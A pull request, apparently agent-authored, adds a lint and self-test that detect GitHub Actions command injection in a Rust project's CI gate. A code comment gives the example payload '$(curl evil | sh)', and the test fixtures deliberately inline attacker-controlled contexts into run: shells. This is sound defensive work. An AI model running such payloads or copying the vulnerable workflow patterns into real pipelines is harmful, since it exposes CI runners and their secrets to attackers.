### PR TITLE
feat(#2656): mechanize recurring roborev blocker classes as --lite lints

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -291,14 +291,22 @@ implement (TDD) → --lite each fix round (summary-file redirect)
 ### Pre-roborev self-check (common findings to pre-empt)
 `roborev_findings` is the #1 recurring delivery cost. Full guidance:
 https://pmcfadin.github.io/cqlite/agents-developing/roborev-findings/
+Three of these classes are now **mechanized as `--lite` lints** (#2656) — the `roborev-lints`
+gate component (GHA injection via `scripts/ci/check-workflow-injection.sh` + the #2642
+wall-clock guard) plus clippy's `manual_range_contains` — so a reintroduction FAILs the fast
+loop, not a review round. The rest stay hand-checked (no low-false-positive static signal).
 - **GitHub Actions injection** — never interpolate `${{ inputs.* }}`/step outputs into `run:`;
-  allowlist-validate fail-closed before any secret step, pass via quoted env var.
-- **clippy `manual_range_contains`** — write `(a..=b).contains(&x)`.
+  allowlist-validate fail-closed before any secret step, pass via quoted env var. MECHANIZED
+  (`roborev-lints`): an attacker-controlled `${{ }}` context inlined in `run:` FAILs `--lite`;
+  mark a provably-safe line `injection-lint-allow`.
+- **clippy `manual_range_contains`** — write `(a..=b).contains(&x)`. MECHANIZED (clippy).
 - **Integer overflow/saturation** — use `num_bigint::BigInt` for unscaled decimal math; compare
   signs/adjusted-exponents first; never materialize `10^scale` with unbounded exponent.
 - **Float ordering vs Java** — `total_cmp` ≠ `Float/Double.compare`; use an explicit comparator
   (NaN last, `-0.0 < +0.0`) when matching Cassandra.
 - **Wall-clock races in tests** — capture the time window to cover ALL sampled operations.
+  MECHANIZED (`roborev-lints`/`tooling-tests`, #2642): a wall-clock threshold assert in the
+  correctness test path FAILs; mark a deliberate `#[ignore]`d perf assert `perf-gate-allow`.
 - **No-heuristics violations** — never infer type/behavior from byte patterns.
 - **Gitignored reference binaries** — `git add -f` tiny parity references; verify against a fresh
   `git worktree add --detach HEAD`, not the dirty tree.

--- a/scripts/agent-gate.sh
+++ b/scripts/agent-gate.sh
@@ -1251,14 +1251,14 @@ _python_build_verify_venv() {
   return 3
 }
 
-COMPONENTS=(file-size fmt clippy core-tests tombstones-scan scan-offload-guard work-counters-guard byte-budget-guard arrow-parity-guard memory-budget integration-tests format-compat write-tests cli-tests compaction-byte-parity query-semantics-oracle python-bindings node-bindings delivery-telemetry oom-audit parity-report operator-metrics-doc kit-dashboard-drift binding-unwind-profile tooling-tests minimal-build smoke)
+COMPONENTS=(file-size fmt clippy roborev-lints core-tests tombstones-scan scan-offload-guard work-counters-guard byte-budget-guard arrow-parity-guard memory-budget integration-tests format-compat write-tests cli-tests compaction-byte-parity query-semantics-oracle python-bindings node-bindings delivery-telemetry oom-audit parity-report operator-metrics-doc kit-dashboard-drift binding-unwind-profile tooling-tests minimal-build smoke)
 # --lite (issue #1821) runs ONLY this fast subset: file-size ratchet, fmt,
 # FULL-workspace clippy (cross-crate API breaks are the cheap-insurance class),
 # and blast-radius-scoped tests (the touched package's --lib + the diff's new
 # test targets), NOT the full core-tests/write/cli/bindings/parity set. It is the
 # FAST ITERATION loop, NOT the gate of record — the full gate must PASS once
 # before merge. See run_lite() below.
-LITE_COMPONENTS=(file-size fmt clippy scoped-tests)
+LITE_COMPONENTS=(file-size fmt clippy roborev-lints scoped-tests)
 # --delta (issue #1892): TEST/DOCS-ONLY RE-CERTIFICATION after a full-gate PASS.
 # Given an anchor (the commit the full gate PASSed at), it verifies the diff
 # anchor..HEAD touches ONLY files the delta can EXECUTE (FAIL-CLOSED if any
@@ -1738,6 +1738,27 @@ run_clippy() {
   env RUSTFLAGS="-D warnings" cargo clippy --all-targets \
     -p cqlite-flight -p cqlite-py -p cqlite-node --features cqlite-node/write-support \
     || return 1
+}
+
+# run_roborev_lints (issue #2656, epic #2636): mechanize the recurring roborev
+# BLOCKER classes that have credible low-false-positive mechanical detection, so
+# they FAIL in the fast --lite loop instead of costing a review round. Two checks:
+#   * check-workflow-injection.sh — the GitHub Actions command-injection class
+#     (top-severity, previously UNMECHANIZED anywhere in the gate).
+#   * check-no-wallclock-asserts.sh — the #2642 wall-clock-race class. It already
+#     ran in the FULL gate (tooling-tests) but NOT in --lite; running it here makes
+#     the fast loop catch a reintroduced wall-clock threshold assert.
+# Other candidate classes from the pre-roborev self-check are deliberately NOT
+# mechanized (see the taxonomy on #2656): manual_range_contains is already caught
+# by clippy; integer/decimal overflow, float-ordering-vs-Java, no-heuristics, and
+# process-global-counter races are semantic (no low-FP static signal); a
+# gitignored-references lint would false-positive on the intentionally-fetched
+# dataset corpus. Both scripts are SKIP-aware (no python3 -> loud SKIP, exit 0),
+# so this component is safe on a stripped runner; any real violation exits non-zero
+# and FAILs the component.
+run_roborev_lints_cmd() {
+  bash "$REPO_ROOT/scripts/ci/check-workflow-injection.sh" &&
+    bash "$REPO_ROOT/scripts/tests/check-no-wallclock-asserts.sh"
 }
 
 run_component() { # run_component <name> <cmd...>
@@ -2424,6 +2445,23 @@ run_tooling_tests() {
     return 0
   fi
 
+  # GHA command-injection guard self-test (#2656): no Docker/datasets needed
+  # (python3-gated inside the script, always attempts). Regression-guards the
+  # roborev-lints component's check-workflow-injection.sh — the real lint runs in
+  # the roborev-lints component itself; this proves the lint still catches a planted
+  # injection sink and does not false-positive. A failure FAILs the component.
+  echo ">>> [$name] bash scripts/tests/test_check_workflow_injection.sh"
+  if ! bash "$REPO_ROOT/scripts/tests/test_check_workflow_injection.sh" >>"$log" 2>&1; then
+    status=FAIL
+    echo "--- [$name] FAILED (GHA injection guard self-test #2656); last 40 lines of $log ---"
+    tail -40 "$log"
+    echo "--- end of $name output ---"
+    end=$(date +%s)
+    record_result "$name" "$status" "$((end - start))"
+    echo ">>> [$name] $status ($((end - start))s)"
+    return 0
+  fi
+
   # docs-only PR-gate classifier self-test (#2645): no python3 needed, always
   # runs (hermetic — pure-shell allowlist classification + pr-gate.yml structural
   # contract that the required status always reports and the #2644 oracle step is
@@ -2878,7 +2916,7 @@ run_scoped_tests() {
 aggregate_lite_components() {
   local -a LN=() LS=() LT=()
   local c rf st secs i
-  for c in file-size fmt clippy; do
+  for c in file-size fmt clippy roborev-lints; do
     rf="$LOG_DIR/$c.result"
     [ -f "$rf" ] || continue   # not run (e.g. --only skip) — do not add, do not fail
     st=""; secs=""
@@ -2907,7 +2945,7 @@ run_lite() {
   echo
   echo "==================================================================="
   echo "  AGENT-GATE --lite  :  FAST ITERATION GATE — *NOT* THE GATE OF RECORD"
-  echo "  Runs: file-size + fmt + scoped workspace clippy + blast-radius-scoped tests."
+  echo "  Runs: file-size + fmt + scoped workspace clippy + roborev-lints + blast-radius-scoped tests."
   echo "  It SKIPS core-tests, write/cli, bindings, parity, smoke, etc."
   echo "  Before merge you MUST run the full  scripts/agent-gate.sh  and it must"
   echo "  PASS — its ==== AGENT-GATE SUMMARY ==== block is the ONLY run that counts."
@@ -2917,6 +2955,7 @@ run_lite() {
   run_file_size
   run_component fmt cargo fmt --all --check
   run_component clippy run_clippy
+  run_component roborev-lints run_roborev_lints_cmd
   run_scoped_tests
 
   # Aggregate the foreground components (file-size/fmt/clippy) into NAMES + OVERALL
@@ -2926,7 +2965,7 @@ run_lite() {
 
   declare -a SUMMARY_META=()
   SUMMARY_META+=("commit: $(git rev-parse --short HEAD) branch: $(git rev-parse --abbrev-ref HEAD) dirty: $(test -n "$(git status --porcelain)" && echo yes || echo no)")
-  SUMMARY_META+=("lite-scope: file-size fmt clippy scoped-tests (full gate NOT run — run it once before merge)")
+  SUMMARY_META+=("lite-scope: file-size fmt clippy roborev-lints scoped-tests (full gate NOT run — run it once before merge)")
   # Python-tier verdict marker (roborev job 1450): when a python-binding diff was
   # in scope, the block carries the tier's verdict — a SKIPPED marker makes a
   # "green but validated nothing" block detectable from the block alone.
@@ -3665,6 +3704,7 @@ dispatch_component() {
   case "$1" in
     fmt) run_component fmt cargo fmt --all --check ;;
     clippy) run_component clippy run_clippy ;;
+    roborev-lints) run_component roborev-lints run_roborev_lints_cmd ;;
     core-tests) run_core_tests ;;
     tombstones-scan) run_component tombstones-scan cargo test --package cqlite-core \
       --features write-support,cli-helpers,tombstones \

--- a/scripts/ci/check-workflow-injection.sh
+++ b/scripts/ci/check-workflow-injection.sh
@@ -1,0 +1,157 @@
+#!/usr/bin/env bash
+# check-workflow-injection.sh — the GitHub Actions command-injection guard
+# (issue #2656, epic #2636: mechanize recurring roborev blocker classes).
+#
+# GitHub Actions command injection is the top-severity recurring roborev BLOCKER
+# class (see the pre-roborev self-check in CLAUDE.md and the roborev-findings
+# doctrine page). The sink: an ATTACKER-CONTROLLED context expression
+# (`${{ github.event.issue.title }}`, `${{ github.head_ref }}`, a commit message,
+# …) interpolated DIRECTLY into a `run:` shell body. On a `pull_request_target`
+# or issue/comment-triggered workflow the value is fully attacker-supplied, so a
+# crafted PR title like `$(curl evil | sh)` executes in the runner — worst in a
+# step that also holds secrets in `env:`.
+#
+# The fix pattern (doctrine): never inline `${{ }}` in `run:`; pass the value
+# through a quoted `env:` var and, for the truly-untrusted contexts, allowlist-
+# validate it fail-closed before any secret step.
+#
+# WHAT THIS FLAGS: an attacker-controlled `${{ ... }}` expression appearing inside
+# a `run:` block body. The context allowlist below is deliberately the
+# well-known attacker-controlled set (GitHub's own script-injection guidance) —
+# NOT every `${{ }}`. `${{ env.* }}`, `${{ steps.*.outputs.* }}`,
+# `${{ inputs.* }}` (workflow_dispatch, maintainer-supplied), and static config
+# are NOT flagged: they are not attacker-controlled and inlining them, while not
+# ideal, is not the injection blocker class this lint mechanizes. Keeping the set
+# tight is what makes the lint fail-closed WITHOUT false-positiving on the ~31
+# benign `${{ env.* }}`/dispatch-input interpolations already on main.
+#
+# Escape hatch (deliberate, reviewer-visible): put `injection-lint-allow` in a
+# comment on the offending `run:` line or the line directly above it, with a
+# one-line rationale. Use it only when the interpolated context is provably not
+# attacker-controlled in the trigger set of that specific workflow.
+#
+# SKIP-aware, modelled on the sibling agent-gate guard scripts: no python3 -> SKIP
+# (loud, never a silent PASS), so it is safe to wire into the gate on a stripped
+# runner. Deterministic and fail-closed: any matching sink exits non-zero and
+# names the offender.
+#
+# Usage:
+#   scripts/ci/check-workflow-injection.sh [PATH...]
+# With no args it scans .github/workflows. Explicit PATH args (files or dirs)
+# override the roots — used by the self-test to point at planted fixtures.
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+
+if ! command -v python3 >/dev/null 2>&1; then
+  echo "SKIP: python3 unavailable (needed to scan workflows for injection sinks)"
+  exit 0
+fi
+
+declare -a ROOTS=()
+if [ "$#" -gt 0 ]; then
+  ROOTS=("$@")
+else
+  [ -d "$REPO_ROOT/.github/workflows" ] && ROOTS+=("$REPO_ROOT/.github/workflows")
+fi
+
+if [ "${#ROOTS[@]}" -eq 0 ]; then
+  echo "SKIP: no .github/workflows present (not a full checkout)"
+  exit 0
+fi
+
+python3 - "${ROOTS[@]}" <<'PY'
+import os, re, sys
+
+roots = sys.argv[1:]
+
+# Attacker-controlled context expressions (GitHub's script-injection guidance).
+# ONLY these are flagged inside run: — deliberately NOT env./steps.*.outputs/
+# inputs./static config, which are not attacker-supplied. Anchored on the context
+# path so `github.event.pull_request.head.sha` (a 40-hex SHA, not injectable) is
+# NOT flagged while `.head.ref`/`.head.label` (a branch name) IS.
+DANGER = re.compile(r'''\$\{\{\s*(
+      github\.event\.(issue|pull_request|comment|review|discussion)\.(title|body)
+    | github\.event\.(issue|pull_request)\.user\.login
+    | github\.event\.(pull_request|comment|review)\.[A-Za-z0-9_.]*\b(ref|label)\b
+    | github\.event\.pull_request\.head\.repo\.[A-Za-z0-9_.]+
+    | github\.head_ref
+    | github\.event\.commits
+    | github\.event\.head_commit\.(message|author)
+    | github\.event\.workflow_run\.head_branch
+    | github\.event\.pages
+)''', re.VERBOSE)
+ALLOW = 'injection-lint-allow'
+
+def run_block_ranges(lines):
+    """Yield (start_idx, end_idx) line ranges (0-based, inclusive) of every
+    `run:` block body. A run: block body is everything more-indented than the
+    `run:` key, until a line at or below that indent. Handles both `run: |`
+    (block scalar) and `run: <inline>` forms."""
+    i, n = 0, len(lines)
+    while i < n:
+        m = re.match(r'^(\s*)(-\s+)?run:\s*(.*)$', lines[i])
+        if not m:
+            i += 1
+            continue
+        indent = len(m.group(1)) + (len(m.group(2)) if m.group(2) else 0)
+        # For `- run:` the block scalar indents relative to the key column; use
+        # the key indent (group 1) as the fence — anything indented past it is body.
+        fence = len(m.group(1))
+        inline = m.group(3).strip()
+        start = i
+        j = i + 1
+        while j < n:
+            ln = lines[j]
+            if ln.strip() == '':
+                j += 1
+                continue
+            cur = len(ln) - len(ln.lstrip())
+            if cur <= fence:
+                break
+            j += 1
+        # body is [start .. j-1]; include the run: line itself for inline form
+        yield (start, j - 1)
+        i = j
+
+violations = []
+for root in roots:
+    files = []
+    if os.path.isfile(root):
+        files = [root]
+    else:
+        for dp, _d, fs in os.walk(root):
+            for f in fs:
+                if f.endswith(('.yml', '.yaml')):
+                    files.append(os.path.join(dp, f))
+    for path in sorted(files):
+        try:
+            lines = open(path, encoding='utf-8').read().split('\n')
+        except OSError:
+            continue
+        for start, end in run_block_ranges(lines):
+            for k in range(start, min(end + 1, len(lines))):
+                ln = lines[k]
+                for mm in DANGER.finditer(ln):
+                    # allow marker on this line or the line directly above
+                    above = lines[k - 1] if k > 0 else ''
+                    if ALLOW in ln or ALLOW in above:
+                        continue
+                    expr = mm.group(0)
+                    violations.append((path, k + 1, expr))
+
+if violations:
+    print("FAIL: attacker-controlled ${{ }} context interpolated into a run: shell")
+    print("      (GitHub Actions command injection — the top roborev BLOCKER class,")
+    print("      issue #2656). Pass the value through a quoted env: var and")
+    print("      allowlist-validate it fail-closed before any secret step; never")
+    print("      inline an attacker-controlled ${{ }} in run:. See")
+    print("      website agents-developing/roborev-findings.")
+    print("      Provably-not-attacker-controlled here? mark it `injection-lint-allow`.")
+    for path, line_no, expr in violations:
+        rel = os.path.relpath(path)
+        print(f"  {rel}:{line_no}: {expr}")
+    sys.exit(1)
+
+print("OK: no attacker-controlled ${{ }} interpolation in any run: shell")
+PY

--- a/scripts/ci/check-workflow-injection.sh
+++ b/scripts/ci/check-workflow-injection.sh
@@ -95,9 +95,14 @@ def run_block_ranges(lines):
             i += 1
             continue
         indent = len(m.group(1)) + (len(m.group(2)) if m.group(2) else 0)
-        # For `- run:` the block scalar indents relative to the key column; use
-        # the key indent (group 1) as the fence — anything indented past it is body.
-        fence = len(m.group(1))
+        # Fence on the `run:` KEY column (`indent`), not the `-` column. Step-level
+        # sibling keys (`env:`, `if:`, `with:`) align at the key column, so a
+        # `fence = len(m.group(1))` (the `-` indent) would swallow an `env:` block
+        # written AFTER `run:` into the "run body" and false-positive on the exact
+        # recommended safe pattern (attacker input passed via a quoted env: var).
+        # Block-scalar body content is indented PAST the key column, so it is still
+        # captured; a sibling key at the key column correctly terminates the body.
+        fence = indent
         inline = m.group(3).strip()
         start = i
         j = i + 1

--- a/scripts/tests/test_check_workflow_injection.sh
+++ b/scripts/tests/test_check_workflow_injection.sh
@@ -97,6 +97,26 @@ if ! bash "$GUARD" "$tmp/benign-env.yml" >/dev/null 2>&1; then
 fi
 echo "OK: benign env. interpolation not flagged"
 
+# 4b. false-positive guard: env: written AFTER run: (list form). The env: block
+# is a step-level sibling key, not run-body — the fence must terminate the body
+# at the `run:` key column so it is not swallowed and false-positived.
+cat >"$tmp/clean-env-after.yml" <<'YML'
+on: [pull_request_target]
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - run: echo "$TITLE"
+        env:
+          TITLE: ${{ github.event.issue.title }}
+YML
+if ! bash "$GUARD" "$tmp/clean-env-after.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard false-positived on env: written AFTER run: (safe pattern)"
+  bash "$GUARD" "$tmp/clean-env-after.yml" || true
+  exit 1
+fi
+echo "OK: env: after run: (list form) not flagged"
+
 # 5. false-positive guard: head.sha (40-hex, not injectable) must NOT trip.
 cat >"$tmp/benign-sha.yml" <<'YML'
 on: [pull_request]

--- a/scripts/tests/test_check_workflow_injection.sh
+++ b/scripts/tests/test_check_workflow_injection.sh
@@ -1,0 +1,142 @@
+#!/usr/bin/env bash
+# test_check_workflow_injection.sh — self-test for the GHA command-injection
+# guard (issue #2656).
+#
+# Proves check-workflow-injection.sh:
+#   1. PASSes on a clean fixture (attacker input passed via a quoted env: var),
+#   2. FAILs on a planted `${{ github.event.issue.title }}` inlined into run:,
+#   3. FAILs on a planted `${{ github.head_ref }}` inlined into run:,
+#   4. does NOT flag a benign `${{ env.* }}` interpolation in run: (false-positive guard),
+#   5. does NOT flag `${{ github.event.pull_request.head.sha }}` (a 40-hex SHA, not injectable),
+#   6. respects the `injection-lint-allow` escape hatch,
+#   7. and PASSes on the real .github/workflows tree.
+# Hermetic: writes fixtures to a temp dir, no cargo/network/datasets.
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+GUARD="$REPO_ROOT/scripts/ci/check-workflow-injection.sh"
+
+if [ ! -f "$GUARD" ]; then
+  echo "FAIL: guard script not found at $GUARD"
+  exit 1
+fi
+
+if ! command -v python3 >/dev/null 2>&1; then
+  echo "SKIP: python3 unavailable (guard is a no-op without it)"
+  exit 0
+fi
+
+tmp="$(mktemp -d)"
+trap 'rm -rf "$tmp"' EXIT
+
+# 1. clean fixture: attacker input flows through a quoted env: var, never inlined.
+cat >"$tmp/clean.yml" <<'YML'
+on: [pull_request_target]
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - env:
+          TITLE: ${{ github.event.issue.title }}
+        run: |
+          echo "processing: $TITLE"
+YML
+if ! bash "$GUARD" "$tmp/clean.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard flagged a clean env-var fixture"
+  bash "$GUARD" "$tmp/clean.yml" || true
+  exit 1
+fi
+echo "OK: clean fixture (env var) PASSes"
+
+# 2. planted violation: issue title inlined into run:.
+cat >"$tmp/bad-title.yml" <<'YML'
+on: [issues]
+jobs:
+  triage:
+    runs-on: ubuntu-latest
+    steps:
+      - run: |
+          echo "title is ${{ github.event.issue.title }}"
+YML
+if bash "$GUARD" "$tmp/bad-title.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard did NOT trip on an inlined github.event.issue.title"
+  exit 1
+fi
+echo "OK: planted issue-title injection is caught"
+
+# 3. planted violation: head_ref inlined into run:.
+cat >"$tmp/bad-headref.yml" <<'YML'
+on: [pull_request_target]
+jobs:
+  b:
+    runs-on: ubuntu-latest
+    steps:
+      - run: git checkout ${{ github.head_ref }}
+YML
+if bash "$GUARD" "$tmp/bad-headref.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard did NOT trip on an inlined github.head_ref"
+  exit 1
+fi
+echo "OK: planted head_ref injection is caught"
+
+# 4. false-positive guard: a benign ${{ env.* }} interpolation must NOT trip.
+cat >"$tmp/benign-env.yml" <<'YML'
+on: [push]
+jobs:
+  b:
+    runs-on: ubuntu-latest
+    env:
+      REGISTRY: ghcr.io/example
+    steps:
+      - run: docker pull "${{ env.REGISTRY }}:latest"
+YML
+if ! bash "$GUARD" "$tmp/benign-env.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard false-positived on a benign env. interpolation"
+  bash "$GUARD" "$tmp/benign-env.yml" || true
+  exit 1
+fi
+echo "OK: benign env. interpolation not flagged"
+
+# 5. false-positive guard: head.sha (40-hex, not injectable) must NOT trip.
+cat >"$tmp/benign-sha.yml" <<'YML'
+on: [pull_request]
+jobs:
+  b:
+    runs-on: ubuntu-latest
+    steps:
+      - run: |
+          echo "${{ github.event.pull_request.head.sha }}" > sha.txt
+YML
+if ! bash "$GUARD" "$tmp/benign-sha.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard false-positived on github.event.pull_request.head.sha"
+  bash "$GUARD" "$tmp/benign-sha.yml" || true
+  exit 1
+fi
+echo "OK: head.sha interpolation not flagged"
+
+# 6. escape hatch: a marked, provably-safe interpolation.
+cat >"$tmp/allowed.yml" <<'YML'
+on: [pull_request]
+jobs:
+  b:
+    runs-on: ubuntu-latest
+    steps:
+      # injection-lint-allow: this workflow only triggers on trusted-branch push, head_ref is our own.
+      - run: echo "${{ github.head_ref }}"
+YML
+if ! bash "$GUARD" "$tmp/allowed.yml" >/dev/null 2>&1; then
+  echo "FAIL: guard ignored the injection-lint-allow escape hatch"
+  bash "$GUARD" "$tmp/allowed.yml" || true
+  exit 1
+fi
+echo "OK: injection-lint-allow escape hatch respected"
+
+# 7. the real .github/workflows tree must be clean.
+if ! bash "$GUARD" >/dev/null 2>&1; then
+  echo "FAIL: the real .github/workflows tree contains an injection sink"
+  bash "$GUARD" || true
+  exit 1
+fi
+echo "OK: real .github/workflows tree is clean"
+
+echo "PASS: check-workflow-injection self-test"

--- a/website/src/content/docs/agents-developing/roborev-findings.md
+++ b/website/src/content/docs/agents-developing/roborev-findings.md
@@ -13,6 +13,26 @@ implementation done — every one pre-empted is a review round saved.
 
 This mirrors the **Pre-roborev self-check** section in `CLAUDE.md`. Keep both in sync.
 
+## Which classes are mechanized in `--lite` (issue #2656)
+
+Two of these classes now FAIL in the fast `scripts/agent-gate.sh --lite` loop (component
+`roborev-lints`) — and the full gate — so you no longer spend a review round on them:
+
+| Class | Mechanized by | Where it runs |
+|-------|---------------|---------------|
+| GitHub Actions command injection | `scripts/ci/check-workflow-injection.sh` — flags an *attacker-controlled* `${{ }}` context (issue/PR title/body, `github.head_ref`, commit message, …) inlined into a `run:` shell | `roborev-lints` (`--lite` + full) |
+| clippy `manual_range_contains` | `cargo clippy -D warnings` | `clippy` (`--lite` + full) |
+| Wall-clock races in tests | `scripts/tests/check-no-wallclock-asserts.sh` (#2642) | `roborev-lints` (`--lite`) + `tooling-tests` (full) |
+
+The other classes below (integer/decimal overflow, float ordering, no-heuristics,
+process-global counters, gitignored references) are **not mechanized**: they are semantic
+or structural, with no low-false-positive static signal (a gitignored-references lint would
+false-positive on the intentionally-fetched dataset corpus). Walk them by hand.
+
+**Escape hatches** (deliberate, reviewer-visible, one-line rationale required): the injection
+lint honours `injection-lint-allow` on the offending `run:` line or the line above it; the
+wall-clock guard honours `perf-gate-allow`.
+
 ## The recurring finding classes
 
 ### GitHub Actions command injection
@@ -21,6 +41,14 @@ interpolated directly into a `run:` shell — worst in a step that holds secrets
 
 **Fix:** allowlist-validate the value fail-closed *before* any secret step, then pass it
 through a quoted env var; never inline `${{ }}` in `run:`.
+
+**Mechanized (#2656):** `scripts/ci/check-workflow-injection.sh` (gate component
+`roborev-lints`, in `--lite` and the full gate) FAILs on an *attacker-controlled* `${{ }}`
+context inlined into `run:`. It scopes to the known attacker-supplied contexts (issue/PR
+title/body, `github.head_ref`, commit message, `workflow_run.head_branch`, …) so it does not
+false-positive on benign `${{ env.* }}` / `${{ inputs.* }}` / `head.sha` interpolations. If a
+context is provably not attacker-controlled in that workflow's triggers, mark the line
+`injection-lint-allow` with a rationale.
 
 ```yaml
 # Not allowed — injection sink


### PR DESCRIPTION
Closes #2656 (mechanize recurring roborev blocker classes as `--lite` lints). Epic #2636.

## Taxonomy conclusion (step 1, recorded on #2656)
`delivery-telemetry.jsonl` records blocker **counts** (`roborev_blockers`), NOT per-finding **classes** — so per-class counts are not machine-extractable; the class taxonomy is the documented recurring self-check set. Snapshot for the trackable baseline: 159 records carry `roborev_blockers`; 80/159 = 50.3% have ≥1 blocker. The issue's **56.7%-of-classified** figure is the fixed reference the post-~20-issue telemetry check compares against (roborev_blockers rate, retro tooling unchanged).

## Lints implemented (2)
- **GHA command injection** — NEW `scripts/ci/check-workflow-injection.sh`. Flags an *attacker-controlled* `${{ }}` context (issue/PR title/body, `github.head_ref`, commit message, `workflow_run.head_branch`, …) inlined into a `run:` shell. Scoped to the known attacker-supplied context set so it does NOT false-positive on the ~31 benign `${{ env.* }}`/dispatch-input/`head.sha` interpolations already on main. Escape hatch: `injection-lint-allow`. Previously UNMECHANIZED anywhere in the gate.
- **Wall-clock races** — the existing #2642 `check-no-wallclock-asserts.sh`, previously only in full-gate `tooling-tests`, now also in the fast `--lite` loop.

Both run in the new `roborev-lints` gate component (wired into `--lite` AND the full gate; SKIP-aware on a stripped runner).

## Classes deliberately skipped (+ why)
- `manual_range_contains` — already caught by clippy `-D warnings` (a lite component).
- Integer/decimal overflow-saturation, float-ordering-vs-Java, no-heuristics, process-global-counter races — semantic/structural, no low-false-positive static signal.
- Gitignored reference binaries — a naive lint would false-positive on the *intentionally-fetched* `test-data/datasets/**/*.db` corpus; cannot mechanically distinguish "should-fetch" from "should-`git add -f`".

## Self-test (planted-violation FAILs)
`scripts/tests/test_check_workflow_injection.sh` (7 cases): planted issue-title + head_ref injections FAIL; clean env-var fixture, benign `${{ env.* }}`, and `head.sha` PASS (false-positive guards); `injection-lint-allow` honored; real `.github/workflows` tree clean. Verified `--only roborev-lints` FAILs on a real-workflow planted sink and PASSes on the clean tree. agent-gate summary/delta self-tests green (67/66); aggregator flips OVERALL on a `roborev-lints` FAIL.

## Doctrine
Synced CLAUDE.md pre-roborev self-check + website `agents-developing/roborev-findings`.

## Files
- `scripts/ci/check-workflow-injection.sh` (new lint)
- `scripts/tests/test_check_workflow_injection.sh` (new self-test)
- `scripts/agent-gate.sh` (scoped: new `roborev-lints` component + runner, wired into `--lite`/full/aggregator; wall-clock now in `--lite`)
- `CLAUDE.md`, `website/src/content/docs/agents-developing/roborev-findings.md` (doctrine)

## Full gate meaningful?
YES — `scripts/agent-gate.sh` changed (new component + array/dispatch edits). flow-closer runs the full gate of record.

## ==== AGENT-GATE LITE SUMMARY ====
```
MODE: lite (FAST ITERATION — NOT the gate of record; full agent-gate.sh must PASS once before merge)
commit: 37f346b14 branch: issue-2656-roborev-lint-mechanize dirty: no
lite-scope: file-size fmt clippy roborev-lints scoped-tests
file-size:         PASS (0s)
fmt:               PASS (8s)
clippy:            PASS (371s)
roborev-lints:     PASS (1s)
scoped-tests:      PASS (265s)
RESULT: PASS
```

Do NOT merge — flow-closer owns the full gate + roborev + merge.
